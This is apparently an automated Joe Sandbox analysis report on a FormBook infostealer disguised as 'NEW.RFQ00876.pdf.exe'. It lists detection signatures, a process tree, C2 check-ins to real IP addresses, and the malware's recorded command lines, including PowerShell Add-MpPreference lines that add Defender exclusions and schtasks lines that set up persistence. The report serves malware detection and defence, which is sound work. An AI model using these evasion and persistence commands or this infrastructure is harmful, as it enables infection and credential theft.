Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NEW.RFQ00876.pdf.exe

Overview

General Information

Sample name:NEW.RFQ00876.pdf.exe
Analysis ID:1571204
MD5:198fadc2115110c8b0b774c88c70215e
SHA1:619b8af2bf8c70ea469a7866cc4ed78a38bc59c1
SHA256:78ab8447457bcf006649029303778dc4d8cfb3a3e6e38de1b17d9be17401bc2b
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • NEW.RFQ00876.pdf.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe" MD5: 198FADC2115110C8B0B774C88C70215E)
    • powershell.exe (PID: 5884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6920 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2172 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7336 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NEW.RFQ00876.pdf.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe" MD5: 198FADC2115110C8B0B774C88C70215E)
      • aegBDZrMeWOlT.exe (PID: 6804 cmdline: "C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • msinfo32.exe (PID: 8080 cmdline: "C:\Windows\SysWOW64\msinfo32.exe" MD5: 5C49B7B55D4AF40DB1047E08484D6656)
          • aegBDZrMeWOlT.exe (PID: 5412 cmdline: "C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4908 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • RAangyFeHdZLco.exe (PID: 7856 cmdline: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe MD5: 198FADC2115110C8B0B774C88C70215E)
    • schtasks.exe (PID: 7976 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmp78E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RAangyFeHdZLco.exe (PID: 8052 cmdline: "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe" MD5: 198FADC2115110C8B0B774C88C70215E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001A.00000002.3732187753.00000000049F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000001A.00000002.3732135762.00000000049A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000001B.00000002.3733834808.0000000005440000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000F.00000002.1464634717.00000000016C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            15.2.NEW.RFQ00876.pdf.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              15.2.NEW.RFQ00876.pdf.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious Double Extension File Execution
                Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", CommandLine: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe, NewProcessName: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe, OriginalFileName: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ProcessId: 6360, ProcessName: NEW.RFQ00876.pdf.exe
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ParentImage: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe, ParentProcessId: 6360, ParentProcessName: NEW.RFQ00876.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ProcessId: 5884, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ParentImage: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe, ParentProcessId: 6360, ParentProcessName: NEW.RFQ00876.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ProcessId: 5884, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmp78E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmp78E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe, ParentImage: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe, ParentProcessId: 7856, ParentProcessName: RAangyFeHdZLco.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmp78E.tmp", ProcessId: 7976, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ParentImage: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe, ParentProcessId: 6360, ParentProcessName: NEW.RFQ00876.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp", ProcessId: 7336, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ParentImage: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe, ParentProcessId: 6360, ParentProcessName: NEW.RFQ00876.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ProcessId: 5884, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ParentImage: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe, ParentProcessId: 6360, ParentProcessName: NEW.RFQ00876.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp", ProcessId: 7336, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T06:56:58.918321+010028554651A Network Trojan was detected192.168.2.74976685.159.66.9380TCP
                2024-12-09T06:57:23.798878+010028554651A Network Trojan was detected192.168.2.749829104.21.62.18480TCP
                2024-12-09T06:57:39.033503+010028554651A Network Trojan was detected192.168.2.74986885.25.177.13880TCP
                2024-12-09T06:58:11.096549+010028554651A Network Trojan was detected192.168.2.749945173.236.199.9780TCP
                2024-12-09T06:58:26.256367+010028554651A Network Trojan was detected192.168.2.749984203.161.42.7380TCP
                2024-12-09T06:58:41.691427+010028554651A Network Trojan was detected192.168.2.74999746.30.211.3880TCP
                2024-12-09T06:58:56.729532+010028554651A Network Trojan was detected192.168.2.75000177.68.64.4580TCP
                2024-12-09T06:59:12.456335+010028554651A Network Trojan was detected192.168.2.750005146.88.233.11580TCP
                2024-12-09T06:59:27.583945+010028554651A Network Trojan was detected192.168.2.750009217.160.0.20080TCP
                2024-12-09T06:59:42.233654+010028554651A Network Trojan was detected192.168.2.75001313.248.169.4880TCP
                2024-12-09T07:00:02.298681+010028554651A Network Trojan was detected192.168.2.75001781.2.196.1980TCP
                2024-12-09T07:00:22.050641+010028554651A Network Trojan was detected192.168.2.750021172.67.215.23580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T06:56:16.750040+010028554641A Network Trojan was detected192.168.2.750023172.67.145.23480TCP
                2024-12-09T06:57:15.822187+010028554641A Network Trojan was detected192.168.2.749805104.21.62.18480TCP
                2024-12-09T06:57:18.480511+010028554641A Network Trojan was detected192.168.2.749811104.21.62.18480TCP
                2024-12-09T06:57:21.145822+010028554641A Network Trojan was detected192.168.2.749820104.21.62.18480TCP
                2024-12-09T06:57:31.029390+010028554641A Network Trojan was detected192.168.2.74984585.25.177.13880TCP
                2024-12-09T06:57:33.693663+010028554641A Network Trojan was detected192.168.2.74985185.25.177.13880TCP
                2024-12-09T06:57:36.368290+010028554641A Network Trojan was detected192.168.2.74986185.25.177.13880TCP
                2024-12-09T06:58:03.079877+010028554641A Network Trojan was detected192.168.2.749923173.236.199.9780TCP
                2024-12-09T06:58:05.808685+010028554641A Network Trojan was detected192.168.2.749929173.236.199.9780TCP
                2024-12-09T06:58:08.417208+010028554641A Network Trojan was detected192.168.2.749936173.236.199.9780TCP
                2024-12-09T06:58:18.242015+010028554641A Network Trojan was detected192.168.2.749962203.161.42.7380TCP
                2024-12-09T06:58:20.897896+010028554641A Network Trojan was detected192.168.2.749968203.161.42.7380TCP
                2024-12-09T06:58:23.583776+010028554641A Network Trojan was detected192.168.2.749974203.161.42.7380TCP
                2024-12-09T06:58:33.671905+010028554641A Network Trojan was detected192.168.2.74999446.30.211.3880TCP
                2024-12-09T06:58:36.369431+010028554641A Network Trojan was detected192.168.2.74999546.30.211.3880TCP
                2024-12-09T06:58:39.013602+010028554641A Network Trojan was detected192.168.2.74999646.30.211.3880TCP
                2024-12-09T06:58:48.580782+010028554641A Network Trojan was detected192.168.2.74999877.68.64.4580TCP
                2024-12-09T06:58:51.391842+010028554641A Network Trojan was detected192.168.2.74999977.68.64.4580TCP
                2024-12-09T06:58:54.138261+010028554641A Network Trojan was detected192.168.2.75000077.68.64.4580TCP
                2024-12-09T06:59:04.694321+010028554641A Network Trojan was detected192.168.2.750002146.88.233.11580TCP
                2024-12-09T06:59:07.117800+010028554641A Network Trojan was detected192.168.2.750003146.88.233.11580TCP
                2024-12-09T06:59:09.805906+010028554641A Network Trojan was detected192.168.2.750004146.88.233.11580TCP
                2024-12-09T06:59:19.595436+010028554641A Network Trojan was detected192.168.2.750006217.160.0.20080TCP
                2024-12-09T06:59:22.289922+010028554641A Network Trojan was detected192.168.2.750007217.160.0.20080TCP
                2024-12-09T06:59:25.010391+010028554641A Network Trojan was detected192.168.2.750008217.160.0.20080TCP
                2024-12-09T06:59:34.246688+010028554641A Network Trojan was detected192.168.2.75001013.248.169.4880TCP
                2024-12-09T06:59:36.899515+010028554641A Network Trojan was detected192.168.2.75001113.248.169.4880TCP
                2024-12-09T06:59:39.564180+010028554641A Network Trojan was detected192.168.2.75001213.248.169.4880TCP
                2024-12-09T06:59:54.311479+010028554641A Network Trojan was detected192.168.2.75001481.2.196.1980TCP
                2024-12-09T06:59:56.969568+010028554641A Network Trojan was detected192.168.2.75001581.2.196.1980TCP
                2024-12-09T06:59:59.706100+010028554641A Network Trojan was detected192.168.2.75001681.2.196.1980TCP
                2024-12-09T07:00:14.169395+010028554641A Network Trojan was detected192.168.2.750018172.67.215.23580TCP
                2024-12-09T07:00:16.710060+010028554641A Network Trojan was detected192.168.2.750019172.67.215.23580TCP
                2024-12-09T07:00:19.390029+010028554641A Network Trojan was detected192.168.2.750020172.67.215.23580TCP
                2024-12-09T07:00:28.970978+010028554641A Network Trojan was detected192.168.2.750022172.67.145.23480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-09T06:57:15.822187+010028563181A Network Trojan was detected192.168.2.749805104.21.62.18480TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeReversingLabs: Detection: 50%
                Multi AV Scanner detection for submitted file
                Source: NEW.RFQ00876.pdf.exeReversingLabs: Detection: 50%
                Source: NEW.RFQ00876.pdf.exeVirustotal: Detection: 49%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 15.2.NEW.RFQ00876.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.NEW.RFQ00876.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001A.00000002.3732187753.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.3732135762.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.3733834808.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1464634717.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1467457983.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.3718055960.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.3732033818.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: NEW.RFQ00876.pdf.exeJoe Sandbox ML: detected
                Source: NEW.RFQ00876.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: NEW.RFQ00876.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1302892229.0000000001623000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msinfo32.pdb source: aegBDZrMeWOlT.exe, 00000018.00000003.1406034191.00000000009FB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdbt source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1302892229.0000000001623000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aegBDZrMeWOlT.exe, 00000018.00000000.1385687295.0000000000E2E000.00000002.00000001.01000000.00000010.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000000.1538536765.0000000000E2E000.00000002.00000001.01000000.00000010.sdmp
                Source: Binary string: wntdll.pdbUGP source: NEW.RFQ00876.pdf.exe, 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1466766317.0000000004A53000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1464102753.00000000048A2000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732385691.0000000004C00000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732385691.0000000004D9E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: NEW.RFQ00876.pdf.exe, NEW.RFQ00876.pdf.exe, 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1466766317.0000000004A53000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1464102753.00000000048A2000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732385691.0000000004C00000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732385691.0000000004D9E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: msinfo32.pdbGCTL source: aegBDZrMeWOlT.exe, 00000018.00000003.1406034191.00000000009FB000.00000004.00000020.00020000.00000000.sdmp

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49766 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49811 -> 104.21.62.184:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49829 -> 104.21.62.184:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49851 -> 85.25.177.138:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49861 -> 85.25.177.138:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49845 -> 85.25.177.138:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49805 -> 104.21.62.184:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.7:49805 -> 104.21.62.184:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49868 -> 85.25.177.138:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49929 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49945 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49936 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49923 -> 173.236.199.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49962 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49968 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49995 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50005 -> 146.88.233.115:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50001 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49998 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50002 -> 146.88.233.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50022 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50014 -> 81.2.196.19:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50006 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50000 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50017 -> 81.2.196.19:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50013 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50010 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49820 -> 104.21.62.184:80
